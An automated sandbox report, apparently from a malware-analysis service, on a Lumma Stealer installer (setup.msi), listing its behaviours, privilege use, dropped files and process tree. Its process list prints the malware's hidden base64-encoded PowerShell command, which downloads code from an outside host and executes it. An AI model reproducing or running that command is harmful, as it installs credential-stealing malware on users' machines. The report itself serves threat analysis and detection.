Malware Analysis Report

2024-11-30 05:21

Sample ID 240710-mea4lathre
Target setup.msi
SHA256 5b3a41ed8a9a619b4aa18cef611c94b3273671ad464847cbfa600a6571c64431
Tags
lumma execution persistence privilege_escalation stealer
score
10/10

Analysis Overview

score
10/10

SHA256

5b3a41ed8a9a619b4aa18cef611c94b3273671ad464847cbfa600a6571c64431

Threat Level: Known bad

The file setup.msi was found to be: Known bad.

Malicious Activity Summary

lumma execution persistence privilege_escalation stealer

Lumma Stealer

Blocklisted process makes network request

Command and Scripting Interpreter: PowerShell

Enumerates connected drives

Blocklisted process makes network request

Downloads MZ/PE file

Suspicious use of SetThreadContext

Drops file in Windows directory

Executes dropped EXE

Loads dropped DLL

Event Triggered Execution: Installer Packages

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Suspicious use of FindShellTrayWindow

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-07-10 10:22

Signatures

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-07-10 10:22

Reported

2024-07-10 10:29

Platform

win10v2004-20240709-en

Max time kernel

93s

Max time network

203s

Command Line

msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\setup.msi

Signatures

Lumma Stealer

stealer lumma

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Installer\inprogressinstallinfo.ipi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIC11D.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIC3FF.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIC578.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\e57c081.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\e57c081.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIC509.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\e57c085.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIC247.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIDFC9.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\ C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\SourceHash{982F5EC8-DA77-4501-8948-29ED7D39B6D6} C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIC361.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIDAB6.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIDB15.tmp C:\Windows\system32\msiexec.exe N/A

Enumerates physical storage devices

Event Triggered Execution: Installer Packages

persistence privilege_escalation
Description Indicator Process Target
N/A N/A C:\Windows\system32\msiexec.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeImpersonatePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 5068 wrote to memory of 2700 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 5068 wrote to memory of 2700 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 5068 wrote to memory of 2700 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 5068 wrote to memory of 2124 N/A C:\Windows\system32\msiexec.exe C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\UnRAR.exe
PID 5068 wrote to memory of 2124 N/A C:\Windows\system32\msiexec.exe C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\UnRAR.exe
PID 5068 wrote to memory of 1680 N/A C:\Windows\system32\msiexec.exe C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\rnpkeys.exe
PID 5068 wrote to memory of 1680 N/A C:\Windows\system32\msiexec.exe C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\rnpkeys.exe
PID 1680 wrote to memory of 2276 N/A C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\rnpkeys.exe C:\Windows\SysWOW64\explorer.exe
PID 1680 wrote to memory of 2276 N/A C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\rnpkeys.exe C:\Windows\SysWOW64\explorer.exe
PID 1680 wrote to memory of 2276 N/A C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\rnpkeys.exe C:\Windows\SysWOW64\explorer.exe
PID 1680 wrote to memory of 2276 N/A C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\rnpkeys.exe C:\Windows\SysWOW64\explorer.exe
PID 2276 wrote to memory of 1840 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2276 wrote to memory of 1840 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2276 wrote to memory of 232 N/A C:\Windows\SysWOW64\explorer.exe C:\Users\Admin\AppData\Local\Temp\a2gW1a5q00RYNUw\svchost.exe
PID 2276 wrote to memory of 232 N/A C:\Windows\SysWOW64\explorer.exe C:\Users\Admin\AppData\Local\Temp\a2gW1a5q00RYNUw\svchost.exe
PID 232 wrote to memory of 3196 N/A C:\Users\Admin\AppData\Local\Temp\a2gW1a5q00RYNUw\svchost.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
PID 232 wrote to memory of 3196 N/A C:\Users\Admin\AppData\Local\Temp\a2gW1a5q00RYNUw\svchost.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
PID 232 wrote to memory of 3196 N/A C:\Users\Admin\AppData\Local\Temp\a2gW1a5q00RYNUw\svchost.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
PID 232 wrote to memory of 3196 N/A C:\Users\Admin\AppData\Local\Temp\a2gW1a5q00RYNUw\svchost.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
PID 232 wrote to memory of 3196 N/A C:\Users\Admin\AppData\Local\Temp\a2gW1a5q00RYNUw\svchost.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Processes

C:\Windows\system32\msiexec.exe

msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\setup.msi

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 0FD73AC00305F1B6DA071516160BD19D

C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\UnRAR.exe

"C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\UnRAR.exe" x -p2161183588a "C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\nijboq.rar" "C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\"

C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\rnpkeys.exe

"C:\Users\Admin\AppData\Roaming\Troxbox Publish\TroxApp\rnpkeys.exe"

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe explorer.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -windowstyle hidden -e JAB3AD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAA7ACQAYgBzAD0AJAB3AC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAIgBoAHQAdABwAHMAOgAvAC8AdAB3AG8ALQByAG8AbwB0AC4AYwBvAG0ALwAwADIAMAA3ADQALgBiAHMANgA0ACIAKQA7AFsAQgB5AHQAZQBbAF0AXQAgACQAeAA9AFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABiAHMALgBSAGUAcABsAGEAYwBlACgAIgAhACIALAAiAGIAIgApAC4AUgBlAHAAbABhAGMAZQAoACIAQAAiACwAIgBoACIAKQAuAFIAZQBwAGwAYQBjAGUAKAAiACQAIgAsACIAbQAiACkALgBSAGUAcABsAGEAYwBlACgAIgAlACIALAAiAHAAIgApAC4AUgBlAHAAbABhAGMAZQAoACIAXgAiACwAIgB2ACIAKQApADsAZgBvAHIAKAAkAGkAPQAwADsAJABpACAALQBsAHQAIAAkAHgALgBDAG8AdQBuAHQAOwAkAGkAKwArACkAewAkAHgAWwAkAGkAXQA9ACAAKAAkAHgAWwAkAGkAXQAgAC0AYgB4AG8AcgAgADEANgA3ACkAIAAtAGIAeABvAHIAIAAxADgAfQA7AGkAZQB4ACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJAB4ACkAKQA=

C:\Users\Admin\AppData\Local\Temp\a2gW1a5q00RYNUw\svchost.exe

"C:\Users\Admin\AppData\Local\Temp\a2gW1a5q00RYNUw\svchost.exe"

C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Network


Files


Analysis: behavioral3

Detonation Overview

Submitted

2024-07-10 10:22

Reported

2024-07-10 10:29

Platform

win11-20240709-en

Max time kernel

149s

Max time network

282s

Command Line

msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\setup.msi

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Installer\MSID7A9.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\ C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\e57bd87.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIBE7D.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIC130.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSID808.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\inprogressinstallinfo.ipi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SystemTemp\~DF7D4F2CE294910176.TMP C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\e57bd83.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIC0B1.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIC11F.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIC160.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SystemTemp\~DF947F9C9271B489D4.TMP C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\SourceHash{982F5EC8-DA77-4501-8948-29ED7D39B6D6} C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIDC9D.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SystemTemp\~DF2BBD3D39CB6F990F.TMP C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\e57bd83.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIC180.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SystemTemp\~DF669FFF9BB76BF927.TMP C:\Windows\system32\msiexec.exe N/A

Enumerates physical storage devices

Event Triggered Execution: Installer Packages

persistence privilege_escalation
Description Indicator Process Target
N/A N/A C:\Windows\system32\msiexec.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeImpersonatePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2276 wrote to memory of 2932 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2276 wrote to memory of 2932 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
